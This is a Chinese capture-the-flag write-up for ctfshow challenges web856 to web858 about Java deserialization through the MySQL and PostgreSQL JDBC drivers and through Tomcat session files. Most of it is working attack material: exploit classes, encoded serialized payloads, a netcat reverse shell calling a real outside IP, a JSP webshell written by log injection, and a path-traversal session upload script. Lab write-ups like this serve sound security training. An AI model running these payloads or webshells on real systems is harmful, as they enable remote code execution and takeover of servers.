%41%41%41%41%55%41%44%77%41%34%41%41%41%41%41%51%41%54%41%42%51%41%41%67%41%4d%41%41%41%41%50%77%41%41%41%41%4d%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%44%51%41%44%67%41%41%41%43%41%41%41%77%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%58%41%42%67%41%41%67%41%5a%41%41%41%41%42%41%41%42%41%42%6f%41%41%51%41%54%41%42%73%41%41%67%41%4d%41%41%41%41%53%51%41%41%41%41%51%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%44%67%41%44%67%41%41%41%43%6f%41%42%41%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%63%41%42%30%41%41%67%41%41%41%41%45%41%48%67%41%66%41%41%4d%41%47%51%41%41%41%41%51%41%41%51%41%61%41%41%67%41%4b%51%41%4c%41%41%45%41%44%41%41%41%41%43%51%41%41%77%41%43%41%41%41%41%44%36%63%41%41%77%46%4d%75%41%41%76%45%6a%47%32%41%44%56%58%73%51%41%41%41%41%45%41%4e%67%41%41%41%41%4d%41%41%51%4d%41%41%67%41%67%41%41%41%41%41%67%41%68%41%42%45%41%41%41%41%4b%41%41%45%41%41%67%41%6a%41%42%41%41%43%58%56%78%41%48%34%41%49%77%41%41%41%64%54%4b%2f%72%71%2b%41%41%41%41%4d%67%41%62%43%67%41%44%41%42%55%48%41%42%63%48%41%42%67%48%41%42%6b%42%41%42%42%7a%5a%58%4a%70%59%57%78%57%5a%58%4a%7a%61%57%39%75%56%55%6c%45%41%51%41%42%53%67%45%41%44%55%4e%76%62%6e%4e%30%59%57%35%30%56%6d%46%73%64%57%55%46%63%65%5a%70%37%6a%78%74%52%78%67%42%41%41%59%38%61%57%35%70%64%44%34%42%41%41%4d%6f%4b%56%59%42%41%41%52%44%62%32%52%6c%41%51%41%50%54%47%6c%75%5a%55%35%31%62%57%4a%6c%63%6c%52%68%59%6d%78%6c%41%51%41%53%54%47%39%6a%59%57%78%57%59%58%4a%70%59%57%4a%73%5a%56%52%68%59%6d%78%6c%41%51%41%45%64%47%68%70%63%77%45%41%41%30%5a%76%62%77%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4a%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%7a%73%42%41%41%70%54%62%33%56%79%59%32%56%47%61%57%78%6c%41%51%41%4d%52%32%46%6b%5a%32%56%30%63%79%35%71%59%58%5a%68%44%41%41%4b%41%41%73%48%41%42%6f%42%41%43%4e%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%77%45%41%45%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%50%59%6d%70%6c%59%33%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%41%49%51%41%43%41%41%4d%41%41%51%41%45%41%41%45%41%47%67%41%46%41%41%59%41%41%51%41%48%41%41%41%41%41%67%41%49%41%41%45%41%41%51%41%4b%41%41%73%41%41%51%41%4d%41%41%41%41%4c%77%41%42%41%41%45%41%41%41%41%46%4b%72%63%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%41%41%41%38%41%41%34%41%41%41%41%4d%41%41%45%41%41%41%41%46%41%41%38%41%45%67%41%41%41%41%49%41%45%77%41%41%41%41%49%41%46%41%41%52%41%41%41%41%43%67%41%42%41%41%49%41%46%67%41%51%41%41%6c%77%64%41%41%45%55%48%64%75%63%6e%42%33%41%51%42%34%64%58%49%41%45%6c%74%4d%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%4e%73%59%58%4e%7a%4f%36%73%57%31%36%37%4c%7a%56%71%5a%41%67%41%41%65%48%41%41%41%41%41%42%64%6e%49%41%48%57%70%68%64%6d%46%34%4c%6e%68%74%62%43%35%30%63%6d%46%75%63%32%5a%76%63%6d%30%75%56%47%56%74%63%47%78%68%64%47%56%7a%41%41%41%41%41%41%41%41%41%41%41%41%41%41%42%34%63%48%4e%79%41%42%46%71%59%58%5a%68%4c%6e%56%30%61%57%77%75%53%47%46%7a%61%45%31%68%63%41%55%48%32%73%48%44%46%6d%44%52%41%77%41%43%52%67%41%4b%62%47%39%68%5a%45%5a%68%59%33%52%76%63%6b%6b%41%43%58%52%6f%63%6d%56%7a%61%47%39%73%5a%48%68%77%50%30%41%41%41%41%41%41%41%41%42%33%43%41%41%41%41%42%41%41%41%41%41%41%65%48%68%32%63%67%41%53%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%39%32%5a%58%4a%79%61%57%52%6c%41%41%41%41%41%41%41%41%41%41%41%41%41%41%42%34%63%48%45%41%66%67%41%75

web856">web856

考察JDBC反序列化,并给了User类和Connection类代码

Connection类源码如下:

package com.ctfshow>ctfshow.entity;
 
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.util.Objects;
 
public class Connection implements Serializable {
 
    private static final long serialVersionUID = 2807147458202078901L;
 
    private String driver;
 
    private String schema;
    private String host;
    private int port;
    private User user;
    private String database;
 
    public String getDriver() {
        return driver;
    }
 
    public void setDriver(String driver) {
        this.driver = driver;
    }
 
    public String getSchema() {
        return schema;
    }
 
    public void setSchema(String schema) {
        this.schema = schema;
    }
 
    public void setPort(int port) {
        this.port = port;
    }
 
    public String getHost() {
        return host;
    }
 
    public void setHost(String host) {
        this.host = host;
    }
 
 
    public User getUser() {
        return user;
    }
 
    public void setUser(User user) {
        this.user = user;
    }
 
    public String getDatabase() {
        return database;
    }
 
    public void setDatabase(String database) {
        this.database = database;
    }
 
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException, SQLException {
        Class.forName("com.mysql.jdbc.Driver");
        ObjectInputStream.GetField gf = in.readFields();
        String host = (String) gf.get("host", "127.0.0.1");
        int port = (int) gf.get("port",3306);
        User user = (User) gf.get("user",new User("root","root"));
        String database = (String) gf.get("database", "ctfshow>ctfshow");
        String schema = (String) gf.get("schema", "jdbc:mysql");
        DriverManager.getConnection( schema+"://"+host+":"+port+"/?"+database+"&user="+user.getUsername());
    }
 
    @Override
    public boolean equals(Object o) {
        if (this == o) return true;
        if (!(o instanceof Connection)) return false;
        Connection that = (Connection) o;
        return Objects.equals(host, that.host) && Objects.equals(port, that.port) && Objects.equals(user, that.user) && Objects.equals(database, that.database);
    }
 
    @Override
    public int hashCode() {
        return Objects.hash(host, port, user, database);
    }
}

User类源码如下:

package com.ctfshow>ctfshow.entity;
 
import java.io.*;
 
public class User implements Serializable {
    private static final long serialVersionUID = -7205095498817563965L;
    private String username;
    private String password;
 
    public User(String username, String password) {
        this.username = username;
        this.password = password;
    }
 
    public String getUsername() {
        return username;
    }
 
    public void setUsername(String username) {
        this.username = username;
    }
 
    public String getPassword() {
        return password;
    }
 
    public void setPassword(String password) {
        this.password = password;
    }
 
 
    @Override
    public boolean equals(Object o) {
        if (this == o) return true;
        if (!(o instanceof User)) return false;
        User user = (User) o;
        return this.hashCode() == user.hashCode();
    }
 
    @Override
    public int hashCode() {
        return username.hashCode()+password.hashCode();
    }
 
 
 
 
}

构造exp:

package com.ctfshow>ctfshow.entity;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutput;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;

public class exp {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException {
        Connection connection = new Connection();
        Class<? extends Connection> aClass = connection.getClass();
        Field host = aClass.getDeclaredField("host");
        host.setAccessible(true);
        host.set(connection,"124.222.136.33");
        Field port = aClass.getDeclaredField("port");
        port.setAccessible(true);
        port.set(connection,3306);
        Field user = aClass.getDeclaredField("user");
        user.setAccessible(true);
        user.set(connection,new User("yso_CommonsCollections4_nc 124.222.136.33 1337 -e sh","123456"));  
        Field schema = aClass.getDeclaredField("schema");
        schema.setAccessible(true);
        schema.set(connection,"jdbc:mysql");
        Field database = aClass.getDeclaredField("database");
        database.setAccessible(true);
        database.set(connection,"detectCustomCollations=true&autoDeserialize=true");
        serialize(connection);
    }
    public static void serialize(Object obj) throws IOException, IOException {
        ByteArrayOutputStream data =new ByteArrayOutputStream();
        ObjectOutput oos =new ObjectOutputStream(data);
        oos.writeObject(obj);
        oos.flush();
        oos.close();
        System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
    };

}

最终payload:

ctfshow>ctfshow=%72%4f%30%41%42%58%4e%79%41%42%31%6a%62%32%30%75%59%33%52%6d%63%32%68%76%64%79%35%6c%62%6e%52%70%64%48%6b%75%51%32%39%75%62%6d%56%6a%64%47%6c%76%62%69%62%30%2f%62%32%47%52%6f%36%31%41%67%41%47%53%51%41%45%63%47%39%79%64%45%77%41%43%47%52%68%64%47%46%69%59%58%4e%6c%64%41%41%53%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%54%64%48%4a%70%62%6d%63%37%54%41%41%47%5a%48%4a%70%64%6d%56%79%63%51%42%2b%41%41%46%4d%41%41%52%6f%62%33%4e%30%63%51%42%2b%41%41%46%4d%41%41%5a%7a%59%32%68%6c%62%57%46%78%41%48%34%41%41%55%77%41%42%48%56%7a%5a%58%4a%30%41%42%6c%4d%59%32%39%74%4c%32%4e%30%5a%6e%4e%6f%62%33%63%76%5a%57%35%30%61%58%52%35%4c%31%56%7a%5a%58%49%37%65%48%41%41%41%41%7a%71%64%41%41%77%5a%47%56%30%5a%57%4e%30%51%33%56%7a%64%47%39%74%51%32%39%73%62%47%46%30%61%57%39%75%63%7a%31%30%63%6e%56%6c%4a%6d%46%31%64%47%39%45%5a%58%4e%6c%63%6d%6c%68%62%47%6c%36%5a%54%31%30%63%6e%56%6c%63%48%51%41%44%6a%45%79%4e%43%34%79%4d%6a%49%75%4d%54%4d%32%4c%6a%4d%7a%64%41%41%4b%61%6d%52%69%59%7a%70%74%65%58%4e%78%62%48%4e%79%41%42%64%6a%62%32%30%75%59%33%52%6d%63%32%68%76%64%79%35%6c%62%6e%52%70%64%48%6b%75%56%58%4e%6c%63%70%77%43%57%39%46%73%4e%70%4c%44%41%67%41%43%54%41%41%49%63%47%46%7a%63%33%64%76%63%6d%52%78%41%48%34%41%41%55%77%41%43%48%56%7a%5a%58%4a%75%59%57%31%6c%63%51%42%2b%41%41%46%34%63%48%51%41%42%6a%45%79%4d%7a%51%31%4e%6e%51%41%4e%48%6c%7a%62%31%39%44%62%32%31%74%62%32%35%7a%51%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%30%58%32%35%6a%49%44%45%79%4e%43%34%79%4d%6a%49%75%4d%54%4d%32%4c%6a%4d%7a%49%44%45%7a%4d%7a%63%67%4c%57%55%67%63%32%67%3d

成功反弹shell

web857">web857

依然是JDBC反序列化,但数据库换成了pgsql

奇安信攻防社区-PostgreSQL JDBC Driver RCE(CVE-2022-21724)与任意文件写入漏洞利用与分析

因为Connection类设置了默认的ip和端口,不符合文章里直接RCE的特征,所以考虑任意文件写入

 

 exp:

package com.ctfshow>ctfshow.entity;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutput;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;

public class exp {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException {
        Connection connection = new Connection();
        Class<? extends Connection> aClass = connection.getClass();
        Field driver = aClass.getDeclaredField("driver");
        driver.setAccessible(true);
        driver.set(connection,"org.postgresql.Driver");
        Field host = aClass.getDeclaredField("host");
        host.setAccessible(true);
        host.set(connection,"124.222.136.33");
        Field port = aClass.getDeclaredField("port");
        port.setAccessible(true);
        port.set(connection,3306);
        Field user = aClass.getDeclaredField("user");
        user.setAccessible(true);
        user.set(connection,new User("Jdk7u21","123456"));
        Field schema = aClass.getDeclaredField("schema");
        schema.setAccessible(true);
        schema.set(connection,"jdbc:postgresql");
        Field database = aClass.getDeclaredField("database");
        database.setAccessible(true);
        database.set(connection,"password=123456&loggerLevel=debug&loggerFile=../webapps/ROOT/yjh.jsp&<%Runtime.getRuntime().exec(request.getParameter(\"i\"));%>");

        serialize(connection);
    }
    public static void serialize(Object obj) throws IOException, IOException {
        ByteArrayOutputStream data =new ByteArrayOutputStream();
        ObjectOutput oos =new ObjectOutputStream(data);
        oos.writeObject(obj);
        oos.flush();
        oos.close();
        System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
    };

}

关于目录

Tomcat 的 web 目录结构通常如下所示:

  1. webapps 目录

    • ROOT:默认的 Web 应用程序根目录,对应 URL 中的 /
    • 其他应用程序目录:每个独立的 Web 应用程序一般会被放置在单独的目录中,例如 myappanotherapp 等。

  2. Web 应用程序目录结构

    • WEB-INF 目录
      • web.xml:Web 应用程序的部署描述文件,配置 Servlet、Filter、Listener 等。
      • classes 目录:存放编译后的 Java 类文件(.class 文件)和资源文件。
      • lib 目录:存放 Web 应用程序依赖的第三方库(JAR 文件)。
    • 静态资源目录:存放 HTML、CSS、JavaScript、图片等静态资源文件。
    • JSP 文件目录:存放 JSP 文件。

  3. 示例目录结构(以 myapp 为例):

/webapps
├── myapp
│   ├── WEB-INF
│   │   ├── web.xml
│   │   ├── classes
│   │   │   └── com
│   │   │       └── example
│   │   │           └── MyClass.class
│   │   ├── lib
│   │   │   └── library.jar
│   ├── index.html
│   ├── styles.css
│   ├── script.js
│   ├── page.jsp

payload:

ctfshow>ctfshow=%72%4f%30%41%42%58%4e%79%41%42%31%6a%62%32%30%75%59%33%52%6d%63%32%68%76%64%79%35%6c%62%6e%52%70%64%48%6b%75%51%32%39%75%62%6d%56%6a%64%47%6c%76%62%69%62%30%2f%62%32%47%52%6f%36%31%41%67%41%47%53%51%41%45%63%47%39%79%64%45%77%41%43%47%52%68%64%47%46%69%59%58%4e%6c%64%41%41%53%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%54%64%48%4a%70%62%6d%63%37%54%41%41%47%5a%48%4a%70%64%6d%56%79%63%51%42%2b%41%41%46%4d%41%41%52%6f%62%33%4e%30%63%51%42%2b%41%41%46%4d%41%41%5a%7a%59%32%68%6c%62%57%46%78%41%48%34%41%41%55%77%41%42%48%56%7a%5a%58%4a%30%41%42%6c%4d%59%32%39%74%4c%32%4e%30%5a%6e%4e%6f%62%33%63%76%5a%57%35%30%61%58%52%35%4c%31%56%7a%5a%58%49%37%65%48%41%41%41%41%7a%71%64%41%42%2b%63%47%46%7a%63%33%64%76%63%6d%51%39%4d%54%49%7a%4e%44%55%32%4a%6d%78%76%5a%32%64%6c%63%6b%78%6c%64%6d%56%73%50%57%52%6c%59%6e%56%6e%4a%6d%78%76%5a%32%64%6c%63%6b%5a%70%62%47%55%39%4c%69%34%76%64%32%56%69%59%58%42%77%63%79%39%53%54%30%39%55%4c%33%6c%71%61%43%35%71%63%33%41%6d%50%43%56%53%64%57%35%30%61%57%31%6c%4c%6d%64%6c%64%46%4a%31%62%6e%52%70%62%57%55%6f%4b%53%35%6c%65%47%56%6a%4b%48%4a%6c%63%58%56%6c%63%33%51%75%5a%32%56%30%55%47%46%79%59%57%31%6c%64%47%56%79%4b%43%4a%70%49%69%6b%70%4f%79%55%2b%64%41%41%56%62%33%4a%6e%4c%6e%42%76%63%33%52%6e%63%6d%56%7a%63%57%77%75%52%48%4a%70%64%6d%56%79%64%41%41%4f%4d%54%49%30%4c%6a%49%79%4d%69%34%78%4d%7a%59%75%4d%7a%4e%30%41%41%39%71%5a%47%4a%6a%4f%6e%42%76%63%33%52%6e%63%6d%56%7a%63%57%78%7a%63%67%41%58%59%32%39%74%4c%6d%4e%30%5a%6e%4e%6f%62%33%63%75%5a%57%35%30%61%58%52%35%4c%6c%56%7a%5a%58%4b%63%41%6c%76%52%62%44%61%53%77%77%49%41%41%6b%77%41%43%48%42%68%63%33%4e%33%62%33%4a%6b%63%51%42%2b%41%41%46%4d%41%41%68%31%63%32%56%79%62%6d%46%74%5a%58%45%41%66%67%41%42%65%48%42%30%41%41%59%78%4d%6a%4d%30%4e%54%5a%30%41%41%64%4b%5a%47%73%33%64%54%49%78

先成功写马 

再访问/yjh.php,用nc反弹shell

成功反弹

web858" style="background-color:transparent;">web858

考察tomcat的session反序列化

Tomcat Session(CVE-2020-9484)反序列化 - 简书

 先随便上传一个文件看看上传路径

抓包看到调用的接口

看下User类

package com.ctfshow>ctfshow.entity;
 
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;
 
public class User implements Serializable {
    private static final long serialVersionUID = -3254536114659397781L;
    private String username;
    private String password;
 
    public String getUsername() {
        return username;
    }
 
    public void setUsername(String username) {
        this.username = username;
    }
 
    public String getPassword() {
        return password;
    }
 
    public void setPassword(String password) {
        this.password = password;
    }
 
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        Runtime.getRuntime().exec(this.username);
    }
 
 
}

exp:

package com.ctfshow>ctfshow.entity;

import java.io.*;
import java.lang.reflect.Field;

public class exp {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, InstantiationException, IOException, ClassNotFoundException {
        
        Class userClass = User.class;
        //创建User实例
        User user = (User)userClass.newInstance();
        //获取username属性
        Field usernameField = userClass.getDeclaredField("username");
        //给属性加权限
        usernameField.setAccessible(true);
        //设置username属性
        usernameField.set(user,"nc  124.222.136.33 1337    -e /bin/sh");


        //获取文件输出流
        FileOutputStream fos = new FileOutputStream("exp.session");
        //获取对象输出流
        ObjectOutputStream oos = new ObjectOutputStream(fos);
        //序列化
        oos.writeObject(user);

    }
}
import requests

url = "http://dfdbd0a0-732e-4512-9113-29d786ce39fb.challenge.ctf.show"
files = {'file': ('exp.session', open('exp.session','rb').read(), 'image/png')}
r = requests.post(url+"/file/upload", files=files)
r2 = requests.get(url, cookies={
    'JSESSIONID': '../../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/upload/exp'})

监听端口,成功反弹shell


http://www.niftyadmin.cn/n/5382500.html

相关文章

陇剑杯 2021刷题记录

陇剑杯 2021刷题记录

题目位置&#xff1a;https://www.nssctf.cn/上有 陇剑杯 2021 1. 签到题题目描述分析答案小结 2. jwt问1析1答案小结 问2析2答案小结 问3析3答案 问4析4答案 问5析5答案 问6析6答案 3. webshell问1析1答案 问2析2答案 问3析3答案 1. 签到题 题目描述 此时正在进行的可能是_…
阅读更多...
GO语言的变量与常量

GO语言的变量与常量

1.变量 go是一个静态语言 变量必须先定义后使用变量必须要有类型 定义变量的方式&#xff1a; var 名称 类型 var 名称 值 名称 :值 例如&#xff1a; var num int 这样就存了一个num类型为int的变量 var num 1 上面使用简化的定义通过num自动判断后面的类型为int并…
阅读更多...
Leetcode 3039. Apply Operations to Make String Empty

Leetcode 3039. Apply Operations to Make String Empty

Leetcode 3039. Apply Operations to Make String Empty 1. 解题思路2. 代码实现 题目链接&#xff1a;3039. Apply Operations to Make String Empty 1. 解题思路 这一题的话其实挺简单的&#xff0c;想清楚的话其实最后一轮遗留的字符必然是出现频率最高的一个或多个字符的…
阅读更多...
【C++杂货铺】string详解

【C++杂货铺】string详解

目录 1. 基本概念&#xff1a; 1.1 本质&#xff1a; 1.2 string和char*区别&#xff1a; 1.3 特点&#xff1a; 2. 构造函数(初始化) 3. 赋值操作 4. 字符串拼接 5 查找 和 替换 6. 字符串比较 7. 字符存取 8. 插入和删除 ​9. 子串获取 &#x1f308;前言&#x…
阅读更多...
Rust 数据结构与算法:2线性数据结构 之 栈

Rust 数据结构与算法:2线性数据结构 之 栈

二、基础数据结构 1、线性数据结构 数组、栈、队列、双端队列、链表这类数据结构都是保存数据的容器,数据项之间的顺序由添加或删除时的顺序决定,数据项一旦被添加,其相对于前后元素就会一直保持位置不变,诸如此类的数据结构被称为线性数据结构。线性数据结构有两端,称为…
阅读更多...
前端样式 Flex布局(Flexible Box Layout)用法详解

前端样式 Flex布局(Flexible Box Layout)用法详解

Flex布局&#xff08;Flexible Box Layout&#xff09;是一种用于在容器内分配和对齐子元素的高效方式。通过Flex布局&#xff0c;可以轻松实现各种复杂的布局结构&#xff0c;同时保持良好的响应性和可维护性。本文将详细介绍Flex布局的用法&#xff0c;包括容器属性和子元素属…
阅读更多...
Spring 用法学习总结(三)之 AOP

Spring 用法学习总结(三)之 AOP

Spring学习 7 bean的生命周期8 AOP面向切面编程8.1 AOP相关术语8.2 AOP使用 7 bean的生命周期 bean的生命周期主要为bean实例化、bean属性赋值、bean初始化、销毁bean&#xff0c;其中在实例化和初始化前后都使用后置处理器方法&#xff0c;而InstantiationAwareBeanPostProce…
阅读更多...
Linux基础IO【文件系统】

Linux基础IO【文件系统】

目录 1.磁盘文件 2.磁盘概念 2.1基本结构 2.2数据存储 3磁盘信息 3.1块组信息 4.文件操作 4.1文件创建 4.2文件访问 4.3对文件增删查改 4.4大文件存储 总结&#xff1a; 1.磁盘文件 在计算机中&#xff0c;没有被打开的文件都是静静的躺在外存&#xff08;磁盘…
阅读更多...
最新文章

Copyright @ 2022~2023